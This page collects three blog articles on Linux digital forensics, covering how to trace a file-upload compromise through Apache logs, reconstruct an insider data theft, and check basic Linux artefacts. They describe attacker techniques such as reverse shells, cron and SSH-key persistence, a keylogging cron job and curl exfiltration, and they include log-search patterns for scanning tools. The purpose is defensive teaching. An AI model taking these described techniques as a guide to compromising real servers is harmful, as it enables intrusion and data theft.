❌

Normal view

There are new articles available, click to refresh the page.
Before yesterdayMain stream

Digital Forensics: How Hackers Compromise Servers Through File Uploads

12 January 2026 at 12:30

Hello, aspiring digital forensics investigators!

In this article, we continue our journey into digital forensics by examining one of the most common and underestimated attack paths: abusing file upload functionality. The goal is to show how diverse real-world compromises can be, and how attackers can rely on legitimate features and not only exotic zero-day exploits. New vulnerabilities appear every day, often with proof-of-concept scripts that automate exploitation. These tools significantly lower the barrier to entry, allowing even less experienced attackers to cause real damage. While there are countless attack vectors available, not every compromise relies on a complex exploit. Sometimes, attackers simply take advantage of features that were never designed with strong security in mind. File upload forms are a perfect example.

Upload functionality is everywhere. Contact forms accept attachments, profile pages allow images, and internal tools rely on document uploads. When implemented correctly, these features are safe. When they are not, they can give attackers direct access to your server. The attack itself is usually straightforward. The real challenge lies in bypassing file type validation and filtering, which often requires creativity rather than advanced technical skills. Unfortunately, this weakness is widespread and has affected everything from small businesses to government websites.

Why File Upload Vulnerabilities Are So Common

Before diving into the investigation, it helps to understand how widespread this issue really is. Platforms like HackerOne contain countless reports describing file upload vulnerabilities across all types of organizations. Looking at reports involving government organizations or well known companies makes it clear that the same weaknesses can appear everywhere, even on websites people trust the most.

U.S Dept of Defense vulnerable to file upload
reddit vulnerable to file upload

As infrastructure grows, maintaining visibility becomes increasingly difficult. Tracking every endpoint, service, and internal application is an exhausting task. Internal servers are often monitored less carefully than internet-facing systems, which creates ideal conditions for attackers who gain an initial foothold and then move laterally through the network, expanding their control step by step.

Exploitation

Let us now walk through a realistic example of how an attacker compromises a server through a file upload vulnerability, and how we can reconstruct the attack from a forensic perspective.

Directory Fuzzing

The attack almost always begins with directory fuzzing, also known as directory brute forcing. This technique allows attackers to discover hidden pages, forgotten upload forms, administrative panels, and test directories that were never meant to be public. From a forensic standpoint, every request matters. It is not only HTTP 200 responses that are interesting.

In our case, the attacker performed directory brute forcing against an Apache web server and left behind clear traces in the logs. By default, Apache stores its logs under /var/log/apache, where access.log and error.log provide insight into what happened.

bash# > less access.log

showing the access log

Even without automation, suspicious activity is often easy to spot. Viewing the access log with less reveals patterns consistent with tools like OWASP DirBuster. Simple one-liners using grep can help filter known tool names, but it is important to remember that behavior matters more than signatures. Attackers can modify headers easily, and in bug bounty testing this is often required to distinguish legitimate testing from malicious activity.

bash# > cat access.log | grep -iaE 'nmap|buster' | uniq -d

finding tools used to scan the website

You might also want to list what pages have been accessed during the directory bruteforce by a certain IP. Here is how:

bash# > cat access.log | grep IP | grep 200 | grep -v 404 | awk β€˜{print $6,$7,$8,$9}’

showing accessed pages in the access log

In larger environments, log analysis is usually automated. Scripts may scan for common tool names such as Nmap or DirBuster, while others focus on behavior, like a high number of requests from a single IP address in a short period of time. More mature infrastructures rely on SIEM solutions that aggregate logs and generate alerts. On smaller systems, tools like Fail2Ban offer a simpler defense by monitoring logs in real time and blocking IP addresses that show brute-force behavior.

POST Method

Once reconnaissance is complete, the attacker moves on to exploitation. This is where the HTTP POST method becomes important. POST is used by web applications to send data from the client to the server and is commonly responsible for handling file uploads.

In this case, POST requests were used to upload a malicious file and later trigger a reverse connection. By filtering the logs for POST requests, we can clearly see where uploads occurred and which attempts were successful.

bash# > cat * | grep -ai post

showing post requests

The logs show multiple HTTP 200 responses, confirming that the file upload succeeded and revealing the exact page used to upload the file.

showing the vulnerable contact page

The web server was hosted locally on-premises rather than in the cloud, that’s why the hacker managed to reach it from the corporate network. Sometimes web servers meant for the internal use are also accessible from the internet, which is a real issue. Often, contact pages that allow file uploads are secured, but other upload locations are frequently overlooked during development.

Reverse Shell

After successfully uploading a file, the attacker must locate it and execute it. This is often done by inspecting page resources using the browser’s developer tools. If an uploaded image or file is rendered on the page, its storage location can often be identified directly in the HTML. Here is an example of how it looks like:

showing how uploaded images are rendered in the html code

Secure websites rename uploaded files to prevent execution. Filenames may be replaced with hashes, timestamps, or combinations of both. In some cases, the Inspect view even reveals the new name. The exact method depends on the developers’ implementation, unless the site is vulnerable to file disclosure and configuration files can be read.

Unfortunately, many websites do not enforce renaming at all. When the original filename is preserved, attackers can simply upload scripts and execute them directly.

The server’s error.log shows repeated attempts to execute the uploaded script. Eventually, the attacker succeeds and establishes a reverse shell, gaining interactive access to the system.

bash# > less error.log

showing reverse shell attempts in the error log

Persistence

Once access is established, the attacker’s priority shifts to persistence. This ensures they can return even if the connection is lost or the system is rebooted.

Method 1: Crontabs and Local Users

One of the most common persistence techniques is abusing cron jobs. Crontab entries allow commands to be executed automatically at scheduled intervals. In this case, the attacker added a cron job that executed a shell command every minute, redirecting input and output through a TCP connection to a remote IP address and port. This ensured the reverse shell would constantly reconnect. Crontab entries can be found in locations such as /etc/crontab.

bash# > cat /etc/crontab

showing crontab persistence

During the investigation, a new account was identified. System files revealed that the attacker created a new account and added a password hash directly to the passwd file.

bash# > cat /etc/passwd | grep -ai root2

showing passwd persistence

The entry shows the username, hashed password, user and group IDs, home directory, and default shell. Creating users and abusing cron jobs are common techniques, especially among less experienced attackers, but they can still be effective when privileges are limited

Method 2: SSH Keys

Another persistence technique involves SSH keys. By adding their own public key to the authorized_keys file, attackers can log in without using passwords. This method is quiet, reliable, and widely abused. From a defensive perspective, monitoring access and changes to the authorized_keys file can provide early warning signs of compromise.

showing the ssh key persistence

Method 3: Services

Persisting through system services gives attackers more flexibility. They also give more room for creativity. For example, the hackers might try to intimidate you by setting up a script that prints text once you log in. This can be ransom demands or other things that convey what they are after.

showing an abused server

Services are monitored by the operating system and automatically restarted if they stop, which makes them ideal for persistence. Listing active services with systemctl helps identify suspicious entries.

bash# > systemctl --state=active --type=service

listing services on linux

In this case, a service named IpManager.service appeared harmless at first glance. Inspecting its status revealed a script stored in /etc/network that repeatedly printed ransom messages. Because the service restarted automatically, the message kept reappearing. Disabling the service immediately stopped the behavior.

Since this issue is so widespread, and because there are constantly new reports of file upload vulnerabilities on HackerOne, not to mention the many undisclosed cases that are being actively exploited by hackers and state-sponsored groups, you really need to stay vigilant.

Summary

The attack does not end with persistence. Once attackers gain root access, they have complete control over the system. Advanced techniques such as rootkits, process manipulation, and kernel-level modifications can allow them to remain hidden for long periods of time. In situations like this, the safest response is often restoring the system from a clean backup created before the compromise. This is why maintaining multiple, isolated backups is critical for protecting important infrastructure.

As your organization grows, it naturally becomes harder to monitor every endpoint and to know exactly what is happening across your environment. If you need assistance securing your servers, hardening your Linux systems, or performing digital forensics to identify attackers, our team is ready to help

Digital Forensics: Basic Linux Analysis After Data Exfiltration

5 January 2026 at 13:26

Welcome back, aspiring DFIR investigators!

Linux machines are everywhere these days, running quietly in the background while powering the most important parts of modern companies. They host databases, file shares, internal tools, email services, and countless other systems that businesses depend on every single day. But the same flexibility that makes Linux so powerful also makes it attractive for attackers. A simple bash shell provides everything someone needs to move files around, connect to remote machines, or hide traces of activity. That is why learning how to investigate Linux systems is so important for any digital forensic analyst.

In an earlier article we walked through the basics of Linux forensics. Today, we will go a step further and look at a scenario, where a personal Linux machine was used to exfiltrate private company data. The employee worked for the organization that suffered the breach. Investigators first examined his company-issued Windows workstation and discovered several indicators tying him to the attack. However, the employee denied everything and insisted he was set up, claiming the workstation wasn’t actually used by him. To uncover the truth and remove any doubts, the investigation moved toward his personal machine, a Linux workstation suspected of being a key tool in the data theft.

Analysis

It is a simple investigation designed for those that are just getting started.

Evidence

Before looking at anything inside the disk, a proper forensic workflow always begins with hashing the evidence and documenting the chain of custody. After that, you create a hashed forensic copy to work on so the original evidence remains untouched. This is standard practice in digital forensics, and it protects the integrity of your findings.

showing the evidence

Once we open the disk image, we can see the entire root directory. To keep the focus on the main points, we will skip the simple checks covered in Basic Linux Forensics (OS-release, groups, passwd, etc.) and move straight into the artifacts that matter most for a case involving exfiltration.

Last Login

The first thing we want to know is when the user last logged in. Normally you can run last with no arguments on a live system, but here we must point it to the wtmp file manually:

bash# > last -f /var/log/wtmp

reading last login file on linux

This shows the latest login from the GNOME login screen, which occurred on February 28 at 15:59 (UTC).

To confirm the exact timestamp, we can check authentication events stored in auth.log, filtering only session openings from GNOME Display Manager:

bash# > cat /var/log/auth.log | grep -ai "session opened" | grep -ai gdm | grep -ai liam

finding when GNOME session was opened

From here we learn that the last GUI login occurred at 2025-02-28 10:59:07 (local time).

Timezone

Next, we check the timezone to ensure we interpret all logs correctly:

bash# > cat /etc/timezone

finding out the time zone

This helps ensure that timestamps across different logs line up properly.

USB

Data exfiltration often involves external USB drives. Some attackers simply delete their shell history, thinking that alone is enough to hide their actions. But they often forget that Linux logs almost everything, and those logs tell the truth even when the attacker tries to erase evidence.

To check for USB activity:

bash# > grep -i usb /var/log/*

finding out information on connected usb drives

Many entries appear, and buried inside them is a serial number from an external USB device.

finding the serial number

Syslog also records the exact moment this device was connected. Using the timestamp (2025-02-28 at 10:59:25) we can filter the logs further and collect more detail about the device.

syslog shows more activity on the the usb connections

We also want to know when it was disconnected:

bash# > grep -i usb /var/log/* | grep -ai disconnect

finding out when the usb drive was disconnected

The last disconnect occurred on 2025-02-28 at 11:44:00. This gives us a clear time window: the USB device was connected for about 45 minutes. Long enough to move large files.

Command History

Attackers use different tricks to hide their activity. Some delete .bash_history. Others only remove certain commands. Some forget to clear it entirely, especially when working quickly.

Here is the user’s history file:

bash# > cat /home/liam/.bash_history

exposing exfiltration activity in the bash history file

Here we see several suspicious entries. One of them is transferfiles. This is not a real Linux command, which immediately suggests it might be an alias. We also see a curl -X POST command, which hints that data was uploaded to an HTTP server. That’s a classic exfiltration method. There is also a hidden directory and a mysterious mth file, which we will explore later.

Malicious Aliases

Hackers love aliases, because aliases allow them to hide malicious commands behind innocent-looking names. For example, instead of typing out a long scp or rsync command that would look suspicious in a history file, they can simply create an alias like backup, sync, or transferfiles. To anyone reviewing the history later, it looks harmless. Aliases also help them blend into the environment. A single custom alias is easy to overlook during a quick review, and some investigators forget to check dotfiles for custom shell behavior.

To see what transferfiles really does, we search for it:

bash# > grep "transferfiles" . -r

finding malicious aliases on linux

This reveals the real command: it copied the entire folder β€œCritical Data TECH*” from a USB device labeled 46E8E28DE8E27A97 into /home/liam/Documents/Data.

finding remnants of exfiltrated data

This aligns perfectly with our earlier USB evidence. Files such as Financial Data, Revenue History, Stakeholder Agreement, and Tax Records were all transferred. Network logs suggest more files were stolen, but these appear to be the ones the suspect personally inspected.

Hosts

The /etc/hosts file is normally used to map hostnames to IP addresses manually. Users sometimes add entries to simplify access to internal services or testing environments. However, attackers also use this file to redirect traffic or hide the true destination of a connection.

Let’s inspect it:

bash# > cat /etc/hosts

finding hosts in the hosts file

In this case, there is an entry pointing to a host involved in the exfiltration. This tells us the suspect had deliberately configured the system to reach a specific external machine.

Crontabs

Crontabs are used to automate tasks. Many attackers abuse cron to maintain persistence, collect information, or quietly run malicious scripts.

There are three main places cron jobs can exist:

1. /etc/crontab –  system-wide

2. /etc/cron.d/ – service-style cron jobs

3. /var/spool/cron/crontabs/ – user-specific entries

Let’s check the user’s crontab:

bash# > cat /var/spool/cron/crontabs/liam

We can see a long string set to run every 30 minutes. This cronjob secretly sends the last five commands typed in the terminal to an attacker-controlled machine. This includes passwords typed in plain text, sudo commands, sensitive paths, and anything else the user entered recently.

This was unexpected. It suggests the system was accessed by someone else, meaning the main suspect may have been working with a third party, or possibly being monitored and guided by them.

To confirm this possibility, let’s check for remote login activity:

bash# > cat /var/log/auth.log | grep -ai accepted

finding authentication in the authlog

Here we find a successful SSH login from an external IP address. This could be that unidentified person entering the machine to retrieve the stolen data or to set up additional tools. At this stage it’s difficult to make a definitive claim, and we would need more information and further interrogation to connect all the pieces.

Commands and Logins in auth.log

The auth.log file stores not only authentication attempts but also certain command-related records. This is extremely useful when attackers use hidden directories or unusual locations to store files.

To list all logged commands:

bash# > cat /var/log/auth.log | grep -ai command

To search for one specific artifact:

bash# > cat /var/log/auth.log | grep -ai mth

exposing executed commands in auth log

This tells us that the file mth was created in /home/liam using nano by user liam. Although this file had nothing valuable, its creation shows the user was active and writing files manually, not through automated tools.

Timestomping

As a bonus step, we will introduce timestamps, which are essential in forensic work. They help investigators understand the sequence of events and uncover attempts at manipulation that might otherwise go unnoticed. Timestomping is the process of deliberately altering file timestamps to confuse investigators. Hackers use it to hide when a file was created or modified. However, Linux keeps several different timestamps for each file, and they don’t always match when something is tampered with.

The stat command helps reveal inconsistencies:

bash# > stat api

exposing timestomping on linux

The output shows:

Birth: Feb 28 2025

Change: Nov 17 2025

Modify: Jan 16 2001

This does not make sense. A file cannot be created in 2025, modified in 2001, and changed again in 2025. That means the timestamps were manually altered. A normal file would have timestamps that follow a logical order, usually showing similar creation and modification dates. By comparing these values across many files, investigators can often uncover when an attacker attempted to clean up their traces or disguise their activity.

Timeline

The investigation still requires more evidence, deeper log correlation, and proper interrogation of everyone involved before a final conclusion can be made. However, based on the artifacts recovered from the Linux machine, we can outline a reasonable assumption of how the events might have taken place.

In the days before the breach, Liam was approached by a third-party group interested in acquiring his company’s confidential data. They gained remote access to his computer via SSH, possibly through a proxy, appearing to log in from a public IP address that does not belong to the company network. Once inside, they installed a cronjob designed to collect Liam’s recent commands that acted as a simple keylogger. This allowed them to gather passwords and other sensitive information that Liam typed in the terminal.

With Liam’s cooperation, or possibly after promising him payment, the attackers guided him through the steps needed to steal the corporate files. On February 28, Liam logged in, connected a USB drive, and executed the hidden alias transferfiles, which copied sensitive folders onto his machine. Moments later, he uploaded parts of the data using a curl POST request to a remote server. When the transfer was done, the accomplices disconnected from the machine, leaving Liam with remnants of stolen data still sitting inside his Documents directory.

The combination of the installed cronjob, the remote SSH connection, and the structured method of transferring company files strongly suggests an insider operation supported by outside actors. Liam was not acting alone, he was assisting a third party, either willingly or under pressure.

Summary

The hardest part of digital forensics is interpreting what the evidence actually means and understanding the story it tells. Individual logs rarely show the full picture by themselves. But when you combine login times, USB events, alias behavior, cronjobs, remote connections and other artifacts a clear narrative begins to form. In this case, the Linux machine revealed far more than the suspect intended to hide. It showed how the data was copied, when the USB device was attached, how remote actors accessed the system, and even how attempts were made to hide the tracks through timestomping and aliases. Each artifact strengthened the overall story and connected the actions together into one coherent timeline. This is the true power of digital forensics that turns fragments of technical evidence into a readable account of what really happened. And with every investigation, your ability to find and interpret these traces grows stronger.

If you want skills that actually matter when systems are burning and evidence is disappearing, this is your next step. Our training takes you into real investigations, real attacks, and real analyst workflows. Built for people who already know the basics and want to level up fast, it’s on-demand, deep, and constantly evolving with the threat landscape.

Learn more

The post Digital Forensics: Basic Linux Analysis After Data Exfiltration first appeared on Hackers Arise.

Digital Forensics: An Introduction to Basic Linux Forensics

6 December 2025 at 10:14

Welcome back, aspiring forensic investigators.Β 

Linux is everywhere today. It runs web servers, powers many smartphones, and can even be found inside the infotainment systems of cars. A few reasons for its wide use are that Linux is open source, available in many different distributions, and can be tailored to run on both powerful servers and tiny embedded devices. It is lightweight, modular, and allows administrators to install only the pieces they need. Those qualities make Linux a core part of many organizations and of our daily digital lives. Attackers favour Linux as well. Besides being a common platform for their tools, many Linux hosts suffer from weak monitoring. Compromised machines are frequently used for reverse proxies, persistence, reconnaissance and other tasks, which increases the need for forensic attention. Linux itself is not inherently complex, but it can hide activity in many small places. In later articles we will dive deeper into what you can find on a Linux host during an investigation. Our goal across the series is to build a compact, reliable cheat sheet you can return to while handling an incident. The same approach applies to Windows investigations as well.

Today we will cover the basics of Linux forensics. For many incidents this level of detail will be enough to begin an investigation and perform initial response actions. Let’s start.

OS & Accounts

OS Release Information

The first thing to check is the distribution and release information. Different Linux distributions use different defaults, package managers and filesystem layouts. Knowing which one you are examining helps you predict where evidence or configuration will live.Β 

bash> cat /etc/os-release

linux os release

Common distributions and their typical uses include Debian and Ubuntu, which are widely used on servers and desktops. They are stable and well documented. RHEL and CentOS are mainly in enterprise environments with long-term support. Fedora offers cutting-edge features, Arch is rolling releases for experienced users, Alpine is very small and popular in containers. Security builds such as Kali or Parrot have pentesting toolsets. Kali contains many offensive tools that hackers use and is also useful for incident response in some cases.

Hostname

Record the system’s hostname early and keep a running list of hostnames you encounter. Hostnames help you map an asset to network records, correlate logs across systems, identify which machine was involved in an event, and reduce ambiguity when combining evidence from several sources.

bash> cat /etc/hostname

bash> hostname

linux hostname

Timezone

Timezone information gives a useful hint about the likely operating hours of the device and can help align timestamps with other systems. You can read the configured timezone with:

bash> cat /etc/timezone

timezone on linux

User List

User accounts are central to persistence and lateral movement. Local accounts are recorded in /etc/passwd (account metadata and login shell) and /etc/shadow (hashed passwords and aging information). A malicious actor who wants persistent access may add an account or modify these files. To inspect the user list in a readable form, use:

bash> cat /etc/passwd | column -t -s :

listing users on linux

You can also list users who are allowed interactive shells by filtering the shell field:

bash> cat /etc/passwd | grep -i 'ash'

Groups

Groups control access to shared resources. Group membership can reveal privilege escalation or lateral access. Group definitions are stored in /etc/group. View them with:

bash> cat /etc/group

listing groups on linux

Sudoers List

Users who can use sudo can escalate privileges. The main configuration file is /etc/sudoers, but configuration snippets may also exist under /etc/sudoers.d. Review both locations:Β 

bash> ls -l /etc/sudoers.d/

bash> sudo cat /etc/sudoers

sudoers list on linux

Login Information

The /var/log directory holds login-related records. Two important binary files are wtmp and btmp. The first one records successful logins and logouts over time, while btmp records failed login attempts. These are binary files and must be inspected with tools such as last (for wtmp) and lastb (for btmp), for example:

bash> sudo last -f /var/log/wtmp

bash> sudo lastb -f /var/log/btmp

lastlog analysis on linux

System Configuration

Network Configuration

Network interface configuration can be stored in different places depending on the distribution and the network manager in use. On Debian-based systems you may see /etc/network/interfaces. For a quick look at configured interfaces, examine:

bash> cat /etc/network/interfaces

listing interfaces on linux

bash> ip a show

lisiting IPs and interfaces on linux

Active Network Connections

On a live system, active connections reveal current communications and can suggest where an attacker is connecting to or from. Traditional tools include netstat:

bash> netstat -natp

listng active network connections on linux

A modern alternative is ss -tulnp, which provides similar details and is usually available on newer systems.

Running Processes

Enumerating processes shows what is currently executing on the host and helps spot unexpected or malicious processes. Use ps for a snapshot or interactive tools for live inspection:

bash> ps aux

listing processes on linux

If available, top or htop give interactive views of CPU/memory and process trees.

DNS Information

DNS configuration is important because attackers sometimes alter name resolution to intercept or redirect traffic. Simple local overrides live in /etc/hosts. DNS server configuration is usually in /etc/resolv.conf. Often attackers might perform DNS poisoning or tampering to redirect victims to malicious services. Check the relevant files:

bash> cat /etc/hosts

hosts file analysis

bash> cat /etc/resolv.conf

resolv.conf file on linux

Persistence Methods

There are many common persistence techniques on Linux. Examine scheduled tasks, services, user startup files and systemd units carefully.

Cron Jobs

Cron is often used for legitimate scheduled tasks, but attackers commonly use it for persistence because it’s simple and reliable. System-wide cron entries live in /etc/crontab, and individual service-style cron jobs can be placed under /etc/cron.d/. User crontabs are stored under /var/spool/cron/crontabs on many distributions. Listing system cron entries might look like:

bash> cat /etc/crontab

crontab analysis

bash> ls /etc/cron.d/

bash> ls /var/spool/cron/crontabs

listing cron jobs

Many malicious actors prefer cron because it does not require deep system knowledge. A simple entry that runs a script periodically is often enough.

Services

Services or daemons start automatically and run in the background. Modern distributions use systemd units which are typically found under /etc/systemd/system or /lib/systemd/system, while older SysV-style scripts live in /etc/init.d/. A quick check of service scripts and unit files can reveal backdoors or unexpected startup items:

bash> ls /etc/init.d/

bash> systemctl list-unit-files --type=service

bash> ls /etc/systemd/system

listing linux services

.Bashrc and Shell Startup Files

Per-user shell startup files such as ~/.bashrc, ~/.profile, or ~/.bash_profile can be modified to execute commands when an interactive shell starts. Attackers sometimes add small one-liners that re-establish connections or drop a backdoor when a user logs in. The downside for attackers is that these files only execute for interactive shells. Services and non-interactive processes will not source them, so they are not a universal persistence method. Still, review each user’s shell startup files:

bash> cat ~/.bashrc

bash> cat ~/.profile

bashrc file on linux

Evidence of Execution

Linux can offer attackers a lot of stealth, as logging can be disabled, rotated, or manipulated. When the system’s logging is intact, many useful artifacts remain. When it is not, you must rely on other sources such as filesystem timestamps, process state, and memory captures.

Bash History

Most shells record commands to a history file such as ~/.bash_history. This file can show what commands were used interactively by a user, but it is not a guaranteed record, as users or attackers can clear it, change HISTFILE, or disable history entirely. Collect each user’s history (including root) where available:

bash> cat ~/.bash_history

bash history

Tmux and other terminal multiplexers themselves normally don’t provide a persistent command log. Commands executed in a tmux session run in normal shell processes. Whether those commands are saved depends on the tmux configurations.Β 

Commands Executed With Sudo

When a user runs commands with sudo, those events are typically logged in the authentication logs. You can grep for recorded COMMAND entries to see what privileged commands were executed:

bash> cat /var/log/auth.log* | grep -i COMMAND | less

Accessed Files With Vim

The Vim editor stores some local history and marks in a file named .viminfo in the user’s home directory. That file can include command-line history, search patterns and other useful traces of editing activity:

bash> cat ~/.viminfo

accessed files by vim

Log Files

Syslog

If the system logging service (for example, rsyslog or journald) is enabled and not tampered with, the files under /var/log are often the richest source of chronological evidence. The system log (syslog) records messages from many subsystems and services. Because syslog can become large, systems rotate older logs into files such as syslog.1, syslog.2.gz, and so on. Use shell wildcards and standard text tools to search through rotated logs efficiently:

bash> cat /var/log/syslog* | head

linux syslog analysis

When reading syslog entries you will typically see a timestamp, the host name, the process producing the entry and a message. Look for unusual service failures, unexpected cron jobs running, or log entries from unknown processes.

Authentication Logs

Authentication activity, such as successful and failed logins, sudo attempts, SSH connections and PAM events are usually recorded in an authentication log such as /var/log/auth.log. Because these files can be large, use tools like grep, tail and less to focus on the relevant lines. For example, to find successful logins you run this:

bash> cat /var/log/auth.log | grep -ai accepted

auth log accepted password

Other Log Files

Many services keep their own logs under /var/log. Web servers, file-sharing services, mail daemons and other third-party software will have dedicated directories there. For example, Apache and Samba typically create subdirectories where you can inspect access and error logs:

bash> ls /var/log

bash> ls /var/log/apache2/

bash> ls /var/log/samba/

different linux log files

Conclusion

A steady, methodical sweep of the locations described above will give you a strong start in most Linux investigations. You start by verifying the OS, recording host metadata, enumerating users and groups, then you move to examining scheduled tasks and services, collecting relevant logs and history files. Always preserve evidence carefully and collect copies of volatile data when possible. In future articles we will expand on file system forensics, memory analysis and tools that make formal evidence collection and analysis easier.

❌
❌